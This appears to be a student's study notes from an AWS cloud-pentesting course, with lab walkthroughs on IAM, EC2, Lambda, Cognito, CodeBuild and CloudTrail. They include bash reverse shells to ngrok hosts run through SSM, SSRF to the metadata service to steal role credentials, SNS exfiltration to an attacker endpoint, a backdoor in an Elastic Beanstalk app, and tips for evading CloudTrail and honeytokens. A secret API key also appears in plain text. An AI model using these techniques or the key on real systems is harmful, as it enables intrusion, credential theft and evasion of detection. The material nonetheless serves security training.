AWS Organization
=======================
If management account is compromised, whole infra will be compromised.
Never use it to run anything, use only for billing and managing.
OUs can contain other OUs and accounts.
An AWS account can only belong to one AWS Organization at a time.
Management Account (root) is not the same as the root user of each account. -- Will
be explained later. MUST REMEMBER TO CHECK
AWS Principals
=====================
MFA factor is lost when jumping roles in accounts
ppap principal
In AWS Identity and Access Management (IAM), roles have a trust policy that
specifies which entities (principals) are allowed to assume the role. The sentence
highlights that although an account might be the principal entity intending to
assume a role, it doesn't always require direct permissions granted within its own
settings to assume that role. Instead, the trust policy defines who (which
principal entities or accounts) is permitted to assume the role, even if the
account of the principal doesn't explicitly grant this permission.
iam - identity providers
be careful and limited when giving access to roles. huge chance of misconfiguration
AWS IAM
============================
also check bf-aws-perms-simulate
cloudtrail2iam
tfstate2iam
Enumerate other organizations
by adding fake roles or users as trusted assume role.
existing ones will not give error.
persistence
dont create a new user if company is using an identity providers, will get caught
instantly
arn:aws:iam::597766930741:policy/iam_lab_2_permission_boundary
STS
=========================
aws consoler
role juggler
KMS
====================
Ransomware attack is possible on customer managed keys
secrets manager
=====================
secrets access is heavily monitored
aws secretsmanager put-resource-policy --secret-id flag_secretsmanager_lab_1 --
resource-policy file://sm.json
can only access secret if we can read secret as well as get the key from KMS.
s3
=====================
exteranl accounts cant overwrite resources polices even if given permission
But can do for ACLs
bucket actions will requrire resource name as just bucket arn
implementing policies on bucket objects from bucket policies will have resource
name as bucket_name/*
cloud_enum
EC2
==============
mostly use SGs over NACLs
NACLS effect all connections, SGs will only effect on new connections
userdata
use the script from cloud hacktricks to get the data for the instance using IMDS
/iam/info
/iam/security-credentials/
the ec2 security credentials are there but cannot be used. The one inside /iam are
usable
LinPEAS can also do it
./linpeas.sh -o cloud
EC2-SSM -- check cloud hacktricks for more interesting stuff
aws ssm describe-instance-information
aws ssm describe-parameters
aws ssm send-command --instance-ids "instance id" --document-name "AWS-
RunShellScript" --output text --parameters commands="whoami && ps -ef | grep -i
ssm" -- run commands on instances managed by ssm
aws ssm get-command-invocation --command-id "copy this from the result of the above
command" --instance-id "<instance-id>" -- Get command results
Anyone can access AMIs and EBS snapshots for use
can target AMIs and snapshots based on ownerid
can also download snapshots and access them locally in a docker container. More
info on hacktricks link for the ec2-privesc section.
Security Group Connection Tracking persistence
i-0343132f279a299eb
172.31.4.83
3.239.183.78
ec2-3-239-183-78.compute-1.amazonaws.com
i-09e6e6d95c7005a9f
172.31.4.7
3.236.174.15
ec2-3-236-174-15.compute-1.amazonaws.com
/bin/bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/19016 0>&1
aws ssm send-command --instance-ids "i-02a11a8f3d95c8126" --document-name "AWS-
RunShellScript" --output text --parameters commands="/bin/bash -i >&
/dev/tcp/2.tcp.eu.ngrok.io/17411 0>&1" --profile ec2_2
i-02a11a8f3d95c8126
curl http://169.254.169.254/latest/meta-data/instance-id
tcp://2.tcp.eu.ngrok.io:17411
aws secretsmanager get-secret-value --secret-id flag_ec2_lab_3 --region us-east-1
aws --profile ec2_3 ec2 describe-iam-instance-profile-associations --filters
Name=instance-id,Values=i-02a11a8f3d95c8126
aws ec2 disassociate-iam-instance-profile --association-id iip-assoc-
014175eae5f3d2dd7
aws --profile ec2_3 ec2 associate-iam-instance-profile --instance-id i-
02a11a8f3d95c8126 --iam-instance-profile Name=ec2_lab_3_secret_access_profile
aws --profile ec2_3 ec2 describe-snapshots --owner-ids 791397163361
aws --profile ec2_3 ec2 describe-snapshots --snapshot-id snap-00ef8467a60c91427
aws ec2 create-volume --snapshot-id snap-00ef8467a60c91427 --availability-zone us-
east-1a --region us-east-1
vol-07f5a02fe62e1a2ee
i-07c92b8257420cd5e
aws ec2 attach-volume --volume-id vol-07f5a02fe62e1a2ee --instance-id i-
07c92b8257420cd5e --device /dev/xvdb --region us-east-1
sudo mount /dev/xvdb1 /tmp/new-dir
sudo cat root/flag.txt
aws --profile ec2_4 ec2 describe-security-groups --group-ids sg-0dcf05c39bf2c27c0
No inbound allowed
i-0343132f279a299eb -- mapped to instance id
aws ec2 authorize-security-group-ingress --group-id sg-0dcf05c39bf2c27c0 --protocol
tcp --port 45380 --cidr 0.0.0.0/0
ec2-3-239-183-78.compute-1.amazonaws.com
http://ec2-3-239-183-78.compute-1.amazonaws.com:45380/fetch?url=http%3a%2f
%2f169.254.169.254%2flatest%2fmeta-data%2fiam%2fsecurity-credentials
%2fec2_lab_4_secret_access_role
aws --profile ec2_4_1 secretsmanager get-secret-value --secret-id flag_ec2_lab_4
LightSail
======================
Mini cloud provider inside AWS
Even has a separate web console
https://lightsail.aws.amazon.com
in real most of wordpress sites on AWS are using lightsail instead of EC2 due to
easiness
Connect to the machine using the web console, can also download the ssh key from
there. EC2 does not store the key
Lightsail instances do not have IAM roles
metadata endpoint
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
Will have a role AmazonLightsailInstanceRole
http://169.254.169.254/latest/meta-data/iam/security-credentials/
AmazonLightsailInstanceRole
This role belongs to AWS, not ours
http://169.254.169.254/latest/meta-data/iam/info
Enumerate
------------
# Instances
aws lightsail get-instances #Get all
aws lightsail get-instance-port-states --instance-name <instance_name>
#Get open ports
# Databases
aws lightsail get-relational-databases
aws lightsail get-relational-database-snapshots
aws lightsail get-relational-database-parameters --relational-database-name <db
name>
# Disk & snapshots
aws lightsail get-instance-snapshots
aws lightsail get-disk-snapshots
aws lightsail get-disks
# More
aws lightsail get-load-balancers
aws lightsail get-static-ips
aws lightsail get-key-pairs
aws lightsail get-buckets --bucket-name my-bucket --include-connected-resources/--
no-include-connected-resources -- if no bucket is specified returns all buckets
DNS service is critical to compromise
LAMBDA
=============
can help in rotating secrets (An example)
/proc/self/environ -- path for IAM creds. does not have a meta-data endpoint
lambda aliases -- read again
code of lambda is stored in /var/task -- if we get ssrf etc
Steal other users lambda URL requests -- read on cloud hacktricks
/var/runtime/bootstrap.py
/var/runtime/awslambdaric -- will find new bootstrap here
Cannot perform this MiTM attack now as lambda runtime has been hardened now
API GATEWAY
=========================
forbidden -- API key needed
check api limits. useful if we want to exhaust limits
get-usage-plan-keys
get-usage
x-api-key header needed
resource policy must check as well
explicit deny error if blocked
AWS IAM auth if missing
{"message":"Missing Authentication Token"}
use postman to give the credentials
Service name: execute-api
Custom Authentication
aws apigateway get-authorizers --rest-api-id <API ID>
e.g in example we are invoking lambda MyLambdaAuth, and request header is
Authorization
Check the function for more details about the token value
EFS
====================================
sudo mkdir /efs
## Mount found
sudo apt install nfs-common
sudo mount -t nfs4 -o
nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport
<IP>:/ /efs
## Mount with efs type
## You need to have installed the package amazon-efs-utils
sudo mount -t efs <file-system-id/EFS DNS name>:/ /efs/
Mount with IAM access
sudo mount -t efs -o tls,iam <file-system-id/EFS DNS name>:/ /efs/
EFS Access points
sudo mount -t efs -o tls,accesspoint=fsap-id <file-system-id/EFS DNS name> /efs/
Enumeration
-----------------
# Get filesystems and access policies (if any)
aws efs describe-file-systems
aws efs describe-file-system-policy --file-system-id <id>
# Get subnetworks and IP addresses where you can find the file system
aws efs describe-mount-targets --file-system-id <id>
aws efs describe-mount-target-security-groups --mount-target-id <fsmt-id>
# Get other access points
aws efs describe-access-points
# Get replication configurations
aws efs describe-replication-configurations
# Search for NFS in EC2 networks, if user doesnot have iam permissions but can do
port scanning
nmap -Pn -p 2049 --open 10.10.10.0/24
<fs-id>.efs.<region>.amazonaws.com
Access or create and EC2 instance in the same subnet as EFS to mount it
RDS
=================================================
no public access by default
Practically clusters are used more
More enumeration commands + techniques in cloud hacktricks
check for associated roles for db clusters / instances
psql --host=<host endpoint> --port=<Port> --username=<db username> --password
Check Abuse Roles from RDS on cloud hacktricks
SELECT datname FROM pg_database;
will have rdsadmin db created in RDS db by default. Good for fingerprinting if we
compromise a DBMS using SQLi
Need to install extensions to access services from DMBS.
e.g. for postfres to work with s3, we need the aws_s3 modules
Select * from pg_extension;
Look for complete s3 technique on cloud hacktricks
need to know exact bucket and object name so we can exfiltrate it
MYSQL
----------------
mysql -h host -u user -P port -p<password>
SELECT User, Host FROM mysql.user;
we will have a user called rdsadmin
show variables; -- can maybe list of roles for the DBMS
DynamoDB
================================
AWS NoSQL DB
Will try to learn injection techniques
# Tables
aws dynamodb list-tables
aws dynamodb describe-table --table-name <t_name> #Get metadata info
aws dynamodb scan --table-name YOUR_TABLE_NAME # dump table content
## The primary key and sort key will appear inside the KeySchema field
# Check if point in time recovery is enabled
aws dynamodb describe-continuous-backups --table-name tablename
# Backups
aws dynamodb list-backups
aws dynamodb describe-backup --backup-arn <arn>
aws dynamodb describe-continuous-backups --table-name <t_name>
# Global tables <tables replicated in different regions for better availability>
aws dynamodb list-global-tables
aws dynamodb describe-global-table --global-table-name <name>
# Exports
aws dynamodb list-exports
aws dynamodb describe-export --export-arn <arn>
# Misc
aws dynamodb describe-endpoints #Dynamodb endpoints
No special priv esc techniques, no IAM roles etc
SQL injection, NoSQL injection, Raw Json Injetion | :property injection
nosql injections are complicated to find for dynamodb
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-
dynamodb-enum#raw-json-injection
ECR
===================
find sensitive info, secrets, code etc
public.ecr.aws/random/name -- public registeries
always uses us-east-1
docker images
docker pull public.ecr.aws/random/name
The aws ecr-public get-login-password command is used to authenticate Docker
clients to an Amazon Elastic Container Registry (ECR) Public registry. This command
retrieves a Docker login command that you can use to authenticate your Docker
client to the ECR Public registry.
aws ecr-public get-login-password --region <region> | docker login --username AWS
--password-stdin <registry-url>
will get a base64 token
Inside the downloaded repo folder
docker build -t <repo name> .
docker push public.ecr.aws/random/repo:<image tag>
set an image tag value, e.g. latest
docker pull <private repo> --- download private repo
need to login before we can download the image
aws ecr get-login-password --region <region> | docker login --username AWS --
password-stdin <registry-url>
docker images -- check downloaded images
Use hacktricks docker forensics to get sensitive data from teh images
docker build -t <repo name> .
The docker tag command in Docker is used to create a tag (a label) for a Docker
image. This command allows you to assign a new image name to an existing image,
making it easier to reference and push to a Docker registry. The basic syntax for
the docker tag command is as follows:
docker tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]
docker tag repo:latest private_repo_url:latest
docker push private_repo_url:latest
ECS
==============================
3 infrastructure options:
fargate
EC2
and
External instances using ECS anywhere, connect your on-prem containers to ECS
Env variables are interesting in tasks
Task definition will specify the container which we want to run
# Clusters info
aws ecs list-clusters
aws ecs describe-clusters --clusters <cluster>
# Container instances
## An Amazon ECS container instance is an Amazon EC2 instance that is running the
Amazon ECS container agent and
has been registered into an Amazon ECS cluster.
aws ecs list-container-instances
aws ecs describe-container-instances
# Services info
aws ecs list-services --cluster <cluster>
aws ecs describe-services --cluster <cluster> --services <services>
aws ecs describe-task-sets --cluster <cluster> --service <service>
# Task definitions
aws ecs list-task-definition-families
aws ecs list-task-definitions
aws ecs list-tasks --cluster <cluster>
aws ecs describe-tasks --cluster <cluster> --tasks <tasks>
## Look for env vars and secrets used from the task definition
aws ecs describe-task-definition --task-definition <TASK_NAME>:<VERSION>
DEMO
aws ecs list-clusters
aws ecs describe-cluster --clusters <cluster-name>
aws ecs list-container-instances --cluster <cluster-name>
aws ecs describe-container-instances --cluster <cluster-name> --container-instances
<container intances arn>
aws ecs list-services --cluster <cluster-name>
aws ecs describe-services --cluster <cluster-name> --services <services arn>
see the tasks, vpc info, roles
aws ecs list-tasks --cluster <cluster-name>
aws ecs describe-tasks --cluster <cluster-name> --tasks <task arn>
see container instace arn, container arn, roles
must enumerate the ec2 to find vpc level info, roles, policies etc
if container is compromised, access the metadata service
lets suppose we compromise the ec2
docker ps
docker exec -it <container id> bash -- access the container of interest
e.g. we are inside wordpress container
ls
check sensitive info etc
use linpeas
./linpeas.sh -o cloud
get the iam creds
check the user-data
check ssm-agent ----- ps -ef
Elastic Beanstalk
=================================
# Find S3 bucket
ACCOUNT_NUMBER=<account_number>
for r in us-east-1 us-east-2 us-west-1 us-west-2 ap-south-1 ap-south-2 ap-
northeast-1 ap-northeast-2 ap-northeast-3 ap-southeast-1 ap-southeast-2 ap-
southeast-3 ca-central-1 eu-central-1 eu-central-2 eu-west-1 eu-west-2 eu-west-3
eu-north-1 sa-east-1 af-south-1 ap-east-1 eu-south-1 eu-south-2 me-south-1 me-
central-1; do aws s3 ls elasticbeanstalk-$r-$ACCOUNT_NUMBER 2>/dev/null && echo
"Found in: elasticbeanstalk-$r-$ACCOUNT_NUMBER"; done
# Get apps and URLs
aws elasticbeanstalk describe-applications # List apps
aws elasticbeanstalk describe-application-versions # Get apps & bucket name with
source code
aws elasticbeanstalk describe-environments # List envs
aws elasticbeanstalk describe-environments | grep -E "EndpointURL|CNAME"
aws elasticbeanstalk describe-environment-resources --environment-name <name>
# Get events
aws elasticbeanstalk describe-events
DEMO
aws elasticbeanstalk describe-applications
aws elasticbeanstalk describe-application-versions
Check the version, s3 bucket and key names
aws elasticbeanstalk describe-environments
Check envirenmentid, solution stack name, endpointURL, CNAME
aws elasticbeanstalk describe-environment-resources --environment-name <ENV Name>
check instance id, launch configuration, autoscaling groups
Launch config will have the roles attached etc, SGs, AMI, user-data etc
Some stuff is also stored directly stored in EC2
aws elasticbeanstalk describe-configuration-settings --application-name <app name>
--environment-name <env name>
check config settings
Inside the EC2
sudo su
cd /opt/elasticbeanstalk
cd proc/<process id>
cat /etc/nginx/nginx.conf
Also get meta-data using the URL or linpeas.sh -o cloud
docker ps -- for apps in container
docker exec -it <id> bash
s3 attack to rebuild the code
download the existing code
nano application.py
add some rev shell code
rezip the code
aws s3 cp file.zip s3://elasticbeanstalk-region-accountid/file.zip
aws elasticbeanstalk rebuild-environment --environment-name <env name>
rebuild the environment
CodeBuild
=============================
interesting for pivoting to other platforms
# List external repo creds (such as github tokens)
## It doesn't return the token but just the ARN where it's located
aws codebuild list-source-credentials
# Projects
aws codebuild list-shared-projects
aws codebuild list-projects
aws codebuild batch-get-projects --names <project_name> # Check for creds in env
vars
# Builds
aws codebuild list-builds
aws codebuild list-builds-for-project --project-name <p_name>
aws codebuild list-build-batches
aws codebuild list-build-batches-for-project --project-name <p_name>
aws codebuild batch-get-builds --ids <build_id>
aws --profile cb_3 codebuild batch-get-build-batches --ids <batch_build_id>
# Reports
aws codebuild list-reports
aws codebuild describe-test-cases --report-arn <ARN>
SNS
=================================================
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>
aws sns get-topic-attributes --topic-arn <topic arn>
VIA Email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
--protocol email \
--notification-endpoint my-email@example.com
Exfiltrate using HTTP
aws sns subscribe --region <region>\
--protocol <http/https> \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
aws sns publish --region <region> \
--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
--message file://message.txt
FIFO topics will be exfiltrated using SQS only
Can give access to only owner, other AWS accounts, or all AWS accounts
Can give service role as well. Cannot compromise the role
subscribers will receive the published messages
Subscriptions must be confirmed
when subscribing and publishing make sure to specify --region, otherwise we would
get error
COGNITO
=====================================
identity pool roles can be allocated for both authenticated and unauthenticated
users.
pool id can be leaked in source code etc.
Must check both authentication flows.
For user pools, self-registration could be enabled. Even if it is not shown in the
app, users can check directly with the AWS Cognito APIs
By default user can read and write values of almost all attributes, if we have a
custom attribute e.g. isAdmin, the user can change it from false to true
# List Identity Pools
aws cognito-identity list-identity-pools --max-results 60
aws cognito-identity describe-identity-pool --identity-pool-id "eu-west-
2:38b294756-2578-8246-9074-5367fc9f5367"
aws cognito-identity list-identities --identity-pool-id "eu-west-2:38b294756-2578-
8246-9074-5367fc9f5367" --max-results 60
aws cognito-identity get-identity-pool-roles --identity-pool-id "eu-west-
2:38b294756-2578-8246-9074-5367fc9f5367"
# User Pools
## Get pools
aws cognito-idp list-user-pools --max-results 60
## Get users
aws cognito-idp list-users --user-pool-id <user-pool-id>
## Get groups
aws cognito-idp list-groups --user-pool-id <user-pool-id>
## Get users in a group
aws cognito-idp list-users-in-group --user-pool-id <user-pool-id> --group-name
<group-name>
## List App IDs of a user pool
aws cognito-idp list-user-pool-clients --user-pool-id <user-pool-id>
## List configured identity providers for a user pool
aws cognito-idp list-identity-providers --user-pool-id <user-poo
## List user import jobs
aws cognito-idp list-user-import-jobs --user-pool-id <user-pool-id> --max-results
60
## Get MFA config of a user pool
aws cognito-idp get-user-pool-mfa-config --user-pool-id <user-pool-id>
## Get risk configuration
aws cognito-idp describe-risk-configuration --user-pool-id <user-pool-id>
DEMO
-------------
try to fuzz, will get error, try to check online and it will point to cognito
request will hit cognito endpoint
we will send params, authflow: user_pass_auth, clientid, and user and pass
successful login will trigger a request to a lambda function
try to access the API lambda directly
we will get unauthorized
default creds are not working
Let us see if sign up is allowed as we have the clientid:
aws cognito-idp sign-up --client-id <client-id> --username <username> --password
<password> --user-attributes Name=email,Value=test@test.com --region <region> --no-
sign-request
We will get a confirmation code
aws cognito-idp confirm-sign-up clientid <client-id> --username <user> --
confirmation-code <code> --no-sign-request --region <region>
Let us login to the site again
We will get the result from the lambda now, it will point to a lambda function
getSecretFlag
in the login access token, if user has any groups we can find them in the base64
decoded values.
we need to find the identity pool id
in the config param for the api gateway, we can use the value /etc/passwd, remember
to send the bearer token for authorization
We can also login using CLI as
aws cognito-idp initiate-auth --auth-flow USER_PASSWORD_AUTH --client-id <client-
id> --region <region> --auth-parameters USERNAME=<user>,PASSWORD=<pass>
we can see the access token and id token
use the idtoken with curl as the bearer token value
in a lambda we can also use /proc/self/environ to leak role creds
Saved the creds as below
[profile]
aws_access_key_id = value
aws_secret_access_key = value
aws_session_token = value
region = us-east-1
aws --profile <profile> sts get-caller-identity
the role was useless, so let us try to leak the lambda source code, the code is
in /var/task/lambda_function.py, we can also directly use lambda_function.py as
code is running from this directory.
in the code we will find the identity pool id
let us get an id from the identity pool
aws cognito-identity get-id --region <region> --identity-pool-id <pool id> --logins
<cognito URL from the token>=<id-token>
We will get an identity id in the output
Now after getting the identity id, we will get the creds for the id
aws cognito-identity get-credentials-for-identity --region <region> --identity-id
<identity id> --logins <cognito URL from the token>=<id-token>
Saved the creds as below
[profile]
aws_access_key_id = value
aws_secret_access_key = value
aws_session_token = value
region = us-east-1
aws --profile <profile> sts get-caller-identity
Then we can list secrets and get the secret value
UNAUTH IDENTITY ID & CREDS
aws cognito-identity get-id --identity-pool-id <pool id> --no-sign-request
aws cognito-identity get-credentials-for-identity --identity-id <identity id> --no-
sign
Check cloud hacktricks to read on more priv esc techniques
WHITEBOX METHODOLOGY
==============================
arn:aws:iam::aws:policy/ReadOnlyAccess
Want to check:
Benchmark checks
Services Enumeration
Expose assets
IAM permissions
Integrations
Check for false positives, do manual checks, don't always rely on automated scans
Check for wildcard and unnecessary permissions for the user
How external users can access AWS services
Cloud hacktricks explains the 5 steps
Benchmark check tools
https://github.com/turbot/steampipe-mod-aws-compliance
https://github.com/turbot/steampipe-mod-aws-insights
https://github.com/aquasecurity/cloudsploit
https://github.com/prowler-cloud/prowler
https://github.com/BishopFox/cloudfox
https://github.com/nccgroup/ScoutSuite
Purplepanda
aws-recon
cloudlist
cloudmapper
pacu
pmapper
Check the billing section to see the services company is paying for, and in which
reasons
exposed assets
https://github.com/turbot/steampipe-mod-aws-perimeter
https://github.com/turbot/steampipe-mod-aws-insights
IAM Permissions
https://github.com/carlospolop/aws_sensitive_permissions
○ https://github.com/duo-labs/cloudmapper
○ https://github.com/nccgroup/PMapper
○ https://github.com/salesforce/cloudsplaining
DEMOS of tools
prowler
prowler -p profile_name
cloudsploit
./index.js --console=table --config ./config.js
https://github.com/turbot/steampipe-mod-aws-insights
https://github.com/turbot/steampipe-mod-aws-perimeter
steampipe dashboard
Cloudfox
./cloudfox aws --profile profile_name all-checks
Can also run cloudfox per service
also enhance output data for pmapper
https://github.com/carlospolop/aws_sensitive_permissions
openai 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
aws_find_external_accounts
BLACKBOX
=========================================
Company Info
emails
linkedin profiles
domains
IPs
AWS account IDs
git leaks
look for stuff in buckets and look inside each file
IdentityPoolids search in github
/us-east-1:[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]
{12}/
Once found we can try to get-id using unauth request
Then use get-credntials-for-identity to get an iam role inside AWS
for unauth we will have less permissions than actual role
only allows access to 14 limited services
we can also try to authenticate via basic flow if it is enabled, by default it is
disabled
first again use the get-id to get an identityid
aws cognito-identity get-open-id-token --identity-id "id" --no-sign --region
<region>
we will get base64 token
aws sts assume-role-with-web-identity --role-arn <role which we got from the
previous flow> --role-session-name <session-name> --web-identity-token <base64
token> --region <region>
now we will be able to perform the actions which were limited previously
Now we move to internal enumeration
Web Console
● AWS cli
● Steampipe
○ https://github.com/turbot/steampipe-mod-aws-perimeter
○ https://github.com/turbot/steampipe-mod-aws-insights
● CloudSploit
● Cloudfox
● Prowler doesn’t work without access to generate a credential report
● Current privileges BF:
○ https://github.com/carlospolop/bf-aws-permissions
○ https://github.com/carlospolop/bf-aws-perms-simulate
○ https://github.com/carlospolop/aws-Perms2ManagedPolicies
○ https://github.com/carlospolop/tfstate2IAM
○ https://github.com/carlospolop/Cloudtrail2IAM
○ https://github.com/carnal0wnage/weirdAAL
○ https://github.com/andresriancho/enumerate-iam
Perform manual enumeration first, then move to automated if you find nothing.
Since most users cannot enumerate their permissions, we will need to brute-force
the possible permissions
https://github.com/carnal0wnage/weirdAAL
This is good
https://github.com/carlospolop/bf-aws-permissions -- good but noisy. only for list,
describe and get permissions.
https://github.com/carlospolop/bf-aws-perms-simulate
Little stealthy, but need simulate permission
https://github.com/carlospolop/aws-Perms2ManagedPolicies -- based on the
permissions, it will show which AWS managed policies do we have
PACU
./bf-aws-permissions.sh -p profile -r region -s "iam|sts|kms|secretsmanager|s3|ec2|
lightsail|lambda|apigateway|apigatewayv2|efs|rds|dynamodb|ecr|ecs|elasticbeanstalk|
codebuild|sqs|sns|cognito-idp"
717727228533.dkr.ecr.us-east-1.amazonaws.com/
blackbox_lab_2@sha256:56a32074b77a984ade279ac44bf4709f9487e932ad06e3b4280eed2aa9131
7e2
try to see if we can create access keys for users
aws iam create-access-key --user-name "admin"
max 2 per user
now we can try to enumerate permissions for the new user.
cyclic process
check groups, role and policies attached to our users
list inline and attached policies
check for versions and if we can set versions, check the policy which could give us
more privs
aws organizations list-accounts
check accounts in our AWS organizations
we can see if we have any children accounts
by default management account has admin prviliges on child accounts with the
organizationaccountaccessrole
follow cloud hacktricks
aws sts assume-role --role-arn <organizationaccountaccessrole child account> --
role-session-name sessionname
we can see the attached policies for this role, it will be admin
Post-Expl
----------
web console -- aws_consoler
confused deputy
instances, snapshots, containers
EKS clusters
codebuild
BlackBox DEMO 2
Start with the bucket URL
there is a file called credentials.txt
file will not be accessible
let us try to user any aws account to see if the file can be downloaded
for no auth we can use the --no-sign-request
aws s3 cp <bucket url + key> .
try to get-bucket-policy
we will also get denied
get-bucket-acl
get-object-acl
alluser have write_acp (Write Access Control Policy) permissions on the object. so
we can use it to give read access
we will use put-object-acl, with --grant-read for all users
uri=http://acs.amazonaws.com/groups/global/AllUsers
we can now get the credentials from the file
now we use aws brute forece permissions to see if we have any permissions
we have some lambda permissions
list the functions, check the names and env variables
in one lambda we found some base64 creds
can also try to get function codes
also decode the hint
we will need to compromise the github repo as indicated by the hint
bf again the permissions for the new user that we found
this user has simulate permissions, so use the simulate permission
using this script we can also find permissions for other users as well
for the new user, we can list groups, add users to groups, get federation token
found codebuildadmin group
also simulate permissions for the group
add our user to the new group
let us get a console view to look at code build permissions
the project will have source as github, and project will be connected with github
so we need to abuse this
we will exfiltrate the token using the codebuild mitm attack
with the token now we will try to download the repo
git clone https://<token>@github.com/path/to/repo
git checkout -b test -- create a new test branch
cd .github/workflows
here we will find a blank workflow file
we know that from this repo we can access a aws role which can read the flag
name: 'Hacktricks STS Task'
# The workflow should only trigger on pull requests to the main branch
on:
push:
branches:
- test
# Required to get the ID Token that will be used for OIDC
permissions:
id-token: write
contents: read # needed for private repos to checkout
jobs:
aws:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
- name: Configure AWS Credentials
uses: aws-actions/configure-aws-credentials@v1
with:
aws-region: us-east-1
role-to-assume: arn:aws:iam::755360453888:role/sts-lab-2-target
role-session-name: OIDCSession
- run: aws secretsmanager list-secrets
shell: bash
- run: aws secretsmanager get-secret-value --secret-id flag_sts_lab_2
shell: bash
We need to run these commnads one by one as right now we do not know the secret
name
git add .
git commit -m "update"
git push --set-upstream origin <test>
owner=rhalyc
repo=ctf
token=<github token>
curl -H "Authorization: token $token"
https://api.github.com/$owner/$repo/actions/runs/$run_id/jobs
check the latest run in from the jobs URL
run_id=<id>
curl -H "Authorization: token $token"
https://api.github.com/$owner/$repo/actions/runs/$run_id/jobs
get job id.
curl -H "Authorization: token $token"
https://api.github.com/$owner/$repo/actions/job/$job_id/logs
we will get the flag in the output
git push origin -d test #remote -- delete our branch
git checkout main
git branch -D test #locally
Cloudtrail
==========================
logging everything inside an AWS account
who, when, and where
# Check CloudTrail
aws cloudtrail list-trails
aws cloudtrail describe-trails
aws cloudtrail list-public-keys
aws cloudtrail get-event-selectors --trail-name <trail_name>
aws [--region us-east-1] cloudtrail get-trail-status --name [default]
# Get insights
aws cloudtrail get-insight-selectors --trail-name <trail_name>
https://github.com/carlospolop/Cloudtrail2IAM
Demo create a trail
enter name
enable for all accounts or not
Create new or use existing s3 bucket
check encryption
log validation
SNS delivery
cloudwatch logs optional
Choose log events, default management event,
data events optional for specific service
API activity read write
bypass - honeytoken
look for services which don't generate cloudtrail logs
<CloudTrail Unsupported Services>
Using the leaked keys, try to access resources inside your attacker account
Generate logs inside our own account
https://github.com/carlospolop/aws_monitor_cloudtrail
Demo canary tokens
create fake AWS creds using canary tokens
now if anyone leaks and use these creds we will get a detection alert on our
webhook
The account id is static for canary token
Since this generates logs we will get caught
but if we use these creds to access a resource in our account, we will get those
alerts and not the original account. e.g.
aws --profile canary_profile sns publish --topic-arn arn:aws:sns:us-east-
1:<my_account_id>:<topicname> --message hello --region us-east-1
we will get an error message, which will leak the original username and account
info
guardduty
================